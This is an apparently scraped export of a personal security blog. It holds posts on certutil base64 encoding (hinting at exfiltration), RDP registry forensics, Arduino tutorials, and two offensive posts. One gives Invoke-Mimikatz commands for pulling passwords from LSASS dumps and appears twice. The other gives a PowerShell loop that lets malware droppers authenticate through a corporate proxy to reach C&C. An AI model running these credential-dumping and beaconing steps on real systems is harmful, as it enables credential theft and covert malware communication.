expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-63400041711145783742016-10-20T07:44:00.000-07:002016-10-20T07:44:52.478-07:00Certutil - Base64 encode/decode<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Simple utility included comes inbuilt in Microsoft windows : certutil.exe<br />
<br />
Link : https://technet.microsoft.com/en-us/library/cc732443(v=ws.11).aspx<br />
<br />
Very useful if you want to quickly convert file into base64 encoding format, and probably exfiltrate later ;)<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ghCJu97J_qclItXdZiUaDw_p4eKageYihuhvjhBs0O0XDY3IOO5D1f7dEBhXLyG4GaAwUpHPcAhhHEmaYWj-5mlgaYkDz7ChUOyg-LicF8JNiuPK4xIzMF43AZPMVFppamReQpz5XfVo/s1600/certutil_1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7ghCJu97J_qclItXdZiUaDw_p4eKageYihuhvjhBs0O0XDY3IOO5D1f7dEBhXLyG4GaAwUpHPcAhhHEmaYWj-5mlgaYkDz7ChUOyg-LicF8JNiuPK4xIzMF43AZPMVFppamReQpz5XfVo/s400/certutil_1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encoding .PNG file in base64 </td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMxgtftc_ainig7PpWtpa3lhTM2tipGV8phCfeVGAyRO9M630ePCp_qzEhQMlIrhHBNgfcSAaz3SP0ogUu9tq8VxL6vBDMP6utlQO4AU_pSEB_Qn9edBOs3fdq0Qd6YX5eLO6cd1REG-L/s1600/certutil_2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdMxgtftc_ainig7PpWtpa3lhTM2tipGV8phCfeVGAyRO9M630ePCp_qzEhQMlIrhHBNgfcSAaz3SP0ogUu9tq8VxL6vBDMP6utlQO4AU_pSEB_Qn9edBOs3fdq0Qd6YX5eLO6cd1REG-L/s400/certutil_2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decoding base64 file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-41476057100821292672016-08-20T06:18:00.000-07:002016-08-20T06:18:12.460-07:00RDP Access Timestamp - Registry Forensics<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
How do we know if System "A" connected to other systems using Remote Desktop in past?<br />
<br />
We can retrieve IP addresses with which RDP connections were established in past along with last time stamp.<br />
<br />
<br />
You can find all machines where RDP was done under below key :<br />
<br />
"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"<br />
<br />
You can see all IP addresses along with DOMAIN/USERNAME used to connect to system via RDP<br />
<br />
If you want to retrieve date and timestamp of last modification of these registry keys - (Which in turn indicates when RDP connection was established with system) then,<br />
<br />
Export registry key as a ".txt" file and you will be able to see "Last Write Time" which is not the case if you export the key as ".reg" - That's the trick!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVGjiNs0wt3lPAqykVc8X2Ls7DkvBjQt9rXyLfY6ev6qdtWq-qyzErRxKR1Phhyphenhyphen0Xqa_12w-8hrr2ginuhn4q1tmgdVTCz7Y-QbgL0JKvwZjNUpF7OC6rAfsK8IV4R4lxtR06hAz81fC93/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVGjiNs0wt3lPAqykVc8X2Ls7DkvBjQt9rXyLfY6ev6qdtWq-qyzErRxKR1Phhyphenhyphen0Xqa_12w-8hrr2ginuhn4q1tmgdVTCz7Y-QbgL0JKvwZjNUpF7OC6rAfsK8IV4R4lxtR06hAz81fC93/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDLJ0_m4Nnnq6rSXGio4k2fI0pS92e4-dUtNgKi9I4kEDGcSbsU7DPYfb5e50Z7ESnd53EYO5NBgzFbCOpH_SkzvRHrpqqy39o8hj3W90QWukc92F54Ar18TEQhqQ5VRaIcI5bjJsxUZY3/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifkcUd1mNRudF4m9esreakXOOxN7FDp43TjLGKpU5yh9VMxJZj3uVeKV3u4lF0Oq8ntzoaIZc4tO22dldSPekJgld4k33IPpp214fVrexdVa36oPnZTdP908pdKJqn89zdyuVJOhEUWBzl/s400/4.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-46448252863976794532016-08-20T05:24:00.002-07:002017-09-11T09:02:44.156-07:00Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.<br />
<br />
However, wanted to crack passwords for other systems!!!<br />
<br />
Simply get LSASS dump from other machines - Not a malicious activity!<br />
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.<br />
<br />
Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.<br />
<br />
<u><br /></u>
<u>Commands Quick Reference :</u><br />
<br />
<ol style="text-align: left;">
<li>Get-ExecutionPolicy</li>
<li>Set-ExecutionPolicy Unrestricted</li>
<li>Import-Module.\powersploit.psm1</li>
<li>Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"' </li>
</ol>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s400/3.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s400/4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s400/6.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<br />
<u><b>Good references :</b></u><br />
https://github.com/PowerShellMafia/PowerSploit<br />
https://adsecurity.org/?page_id=1821<br />
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1<br />
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780<br />
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-16243226456340162702016-08-20T05:24:00.001-07:002016-08-20T05:28:27.084-07:00Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Came across a scenario where, was able to run powersploit on one of the machine (HOST) with antivirus.<br />
<br />
However, wanted to crack passwords for other systems!!!<br />
<br />
Simply get LSASS dump from other machines - Not a malicious activity!<br />
Copy all those LSASS dump files on (HOST) and using powersploit -Command argument retrieve passwords from LSASS dump.<br />
<br />
Executing powersploit - Invoke-Mimikatz tool to retrieve passwords from LSASS dump file.<br />
<br />
<u><br /></u>
<u>Commands Quick Reference :</u><br />
<br />
<ol style="text-align: left;">
<li>Get-ExecutionPolicy</li>
<li>Set-ExecutionPolicy Unrestricted</li>
<li>Import-Module.\powersploit.psm1</li>
<li>Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"' </li>
</ol>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgydNBveea8XIhU-RJ6BB1L1dFdhiLXFX3DCVZ3BTJfqreLtNNIxYIX0blbNxVItqcMilVwxT4h1I-b26_9aLwUJ5xERuCdNzQK2lQMy1Na4d8m9AWD7EKTZn-zoRmuK6vCWh3iaQ_hGipy/s400/1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1-PMMET2iBjSLuFJa3dRJUpYzt3xntFYxZF3M5ul-ed5oLexrWKWaDaU2qzxHT3crlpRx1JkQWY_hInweI_gDSm3ur0_igCJm6Q6DZG3dDI7feNWpgrWo8J4mGFmiu47x3IcPPA7mHGV0/s400/2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLdkQjOvV7NAt83egHXyvdArAYh-cXZaPE5_CVK5YKre_gJG28D5fZKFem1fAs0w2JNePFLzWbILOjbZX7raPI-ek51a3a-xdkZvR4YGhQ2w4MI0dtXjXvbU5hviPCEY4dfw3g1D2BG3k3/s400/3.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42rzA411-jmjV9ppcZlkwALyc6cORcD536MLgz6DZCpXXCokGWq6PXo0C81Sfjy7FCEs-OtOtQgCPiZ4aTezcYYAXQP_L5LMy7ye6VfWl7-D6btPzTDjwGJsOK8Lk2hIW8PFB1FOvCxI3/s400/4.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgguboQEnofd8e-jGw0cvgFaoJNadMur0x71ReAaEGRmREjEo14xM8bYOkcXfAgza2sao3XXke1K3GDZ50SYN5sWdBBA9F_5Ena8RRamRUwPcCoY9q9jiANuJhLfM6x-5A3IYjODX8bT6J-/s400/6.PNG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br />
<br />
<u><b>Good references :</b></u><br />
https://github.com/PowerShellMafia/PowerSploit<br />
https://adsecurity.org/?page_id=1821<br />
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1<br />
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780<br />
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-28984092625986702392016-05-05T21:23:00.001-07:002016-05-05T21:23:34.359-07:00Authenticate to proxy with current credentials<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Droppers when deployed on victim machines attempt to connect to C&C centre however corporate proxy comes into picture<br />
<br />
Below Powershell code will authenticate to proxy via current credentials and fetch contents from "http://microsoft.com"<br />
<br />
<br />
for($i=0; $i -le 0; $i)<br />
{<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc = New-Object System.Net.WebClient<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>$wc.DownloadString('http://microsoft.com')<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Start-Sleep -s 5<br />
<br />
}<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFnKXG2olVpaAAZBgBz0jZ2ZwA4VV8dBVL3FFCQuKbPbmzOk0sTNRA9nms7u5zUU8y4lH7enPrkwjUBD-pplOA4OU5nFLhY2lr3cPNT26qqeoLktYWLtTFWqK_NFVkTFCyIVqM1FBYqxxh/s1600/proxy.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFnKXG2olVpaAAZBgBz0jZ2ZwA4VV8dBVL3FFCQuKbPbmzOk0sTNRA9nms7u5zUU8y4lH7enPrkwjUBD-pplOA4OU5nFLhY2lr3cPNT26qqeoLktYWLtTFWqK_NFVkTFCyIVqM1FBYqxxh/s400/proxy.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We can further create powershell script executable .exe file with PS2EXE<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-21312786884994211552016-04-30T12:16:00.004-07:002016-04-30T23:45:22.503-07:00Arduino - Display Character on 4 Digit 7 Segment Display<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Going one step further in learning Arduino UNO, I wanted to print word "HACK" on Display module with 4 Digit and 7 Segments, you can check specification here : <a href="http://www.dx.com/p/arduino-compatible-4-digit-12-pin-display-module-140220#.VyUEEXF96M8">Link</a><br />
<br />
I was struggling to know how it works and which pins to connect where on Arduino board.<br />
<br />
As its digital display we will use Digital pins from Arduino board from 1 to 13.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrbKpsKoadpf6idV52aUPI9SFcjk3FqI1a_bxOyZq6QCZ60LscnM3lj9lF6YDY3hDYrqfBtr8X_R7QGYWkhZ8XsqzE5DZ5phHYDXFSd3-IodnORXhSnUn7d7ljzFtAlHHqv8h1d1pPWSa/s1600/20160501_002546.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrbKpsKoadpf6idV52aUPI9SFcjk3FqI1a_bxOyZq6QCZ60LscnM3lj9lF6YDY3hDYrqfBtr8X_R7QGYWkhZ8XsqzE5DZ5phHYDXFSd3-IodnORXhSnUn7d7ljzFtAlHHqv8h1d1pPWSa/s400/20160501_002546.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
This is how segments are numbered on actual Display Unit from a to g<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0bkDi6hgHf73RQZ6IQjmeaGg_8S_6U5-jU0B7eRfP7dLIO75siGAwOmvV8xPty9kkczBbKWpJI7RiOeffCMJ6wY4dt1OPOl0XVspeM2EmjxW0Z5Nf_8k3ySkt6TH-9N_jY6cl6gjjuMty/s1600/arduino_3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0bkDi6hgHf73RQZ6IQjmeaGg_8S_6U5-jU0B7eRfP7dLIO75siGAwOmvV8xPty9kkczBbKWpJI7RiOeffCMJ6wY4dt1OPOl0XVspeM2EmjxW0Z5Nf_8k3ySkt6TH-9N_jY6cl6gjjuMty/s400/arduino_3.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now how do you set-up the Circuit?<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyvbHoNREEwc8c9ZzJbPgAnePXwqteyiwaLi3CEcd4N38l6H13iKb-k8pvTFsmlm4igfq4gdOsDx1uKnXodOn_szp_ReZZaS6taBS0Q8YCtR4pFpTsxcErJcyI-4WTzBgmtDWhZng0On2/s1600/arduino_3.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyvbHoNREEwc8c9ZzJbPgAnePXwqteyiwaLi3CEcd4N38l6H13iKb-k8pvTFsmlm4igfq4gdOsDx1uKnXodOn_szp_ReZZaS6taBS0Q8YCtR4pFpTsxcErJcyI-4WTzBgmtDWhZng0On2/s400/arduino_3.png" width="343" /></a><br />
<br />
Pin structure and its functionality is as follows :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjcyd30eEtfrYtbCuS1XhRnwyM6R-JzOpZsd4huC8G-bNG2GSQXw1R8ewxnpDZWILSTXKnQ_O07rLAcQoSIY70NwOd1JhRnbiX2eFum3AK7pGsShmuTG2SQqrei48X78CZcP1rUyE0HPrW/s1600/pin+structure.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjcyd30eEtfrYtbCuS1XhRnwyM6R-JzOpZsd4huC8G-bNG2GSQXw1R8ewxnpDZWILSTXKnQ_O07rLAcQoSIY70NwOd1JhRnbiX2eFum3AK7pGsShmuTG2SQqrei48X78CZcP1rUyE0HPrW/s400/pin+structure.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Key is Logic!....If you want to display anything on Digit 1 of display uni then you need to enable Arduino Pin 2 and set its voltage to HIGH and set other Digits to LOW<br />
<br />
<u>Core Program Logic </u><br />
<u><br /></u>
1. Turn on first digit, turn off all other digits <br />
2. Turn on segments we need for first digit and set delay to 5<br />
3. Turn off all digits, turn on second digit<br />
4. Turn on segments we need for second digit and set delay to 5<br />
5. Turn off all digits, turn on third digit<br />
6. Turn on segment we need for third digit and set delay to 5<br />
7. Turn off all digits, turn on fourth digit<br />
<br />
8. Turn on all segments we need for fourth digit and set delay to 5<br />
<u><br /></u>
<u><br /></u>
<div>
<a href="https://drive.google.com/file/d/0B4fmHoqW8qjTSHRtbkFIWU94VXM/view?usp=sharing">View Complete Program</a> </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX35GleewZ3Rmb8rzl9ngSZVZMj1anxwV7D3qH0AnHDVKr8o51TtLa0u-9nZhl3000NGKvn_ZgdNyKxRqrTZQHAZ2HLAsSRIOdAQIOePWVmntmtEfFHWisue7WoxMW6IpWKTEJ-f1-XFcc/s1600/20160430_234845.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX35GleewZ3Rmb8rzl9ngSZVZMj1anxwV7D3qH0AnHDVKr8o51TtLa0u-9nZhl3000NGKvn_ZgdNyKxRqrTZQHAZ2HLAsSRIOdAQIOePWVmntmtEfFHWisue7WoxMW6IpWKTEJ-f1-XFcc/s400/20160430_234845.jpg" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hope this helps...!<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-63692030810067769022016-04-30T12:08:00.001-07:002016-04-30T12:08:31.052-07:00Arduino Uno Tutorial - Blinking LED <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
I never worked on Arduino before so it's really interesting!..<br />
<br />
Just to give you basic intro, we can use Arduino board for connecting multiple sensors, LED's, Display Units and program them to what we want!.<br />
<br />
To start with, lets blink an LED !<br />
<br />
<br />
<br />
<ol style="text-align: left;">
<li>Take any sample LED light, in simple language it always has 2 "Legs" one is long and other is short - Long Leg = Positive (+) , Short Leg = Negative (-)</li>
<li>For this project, insert Short Leg of your LED into ground socket "GND" of your Arduino board and Long Leg into Socket No. 13</li>
<li>Now your all set for programming your Arduino Board.</li>
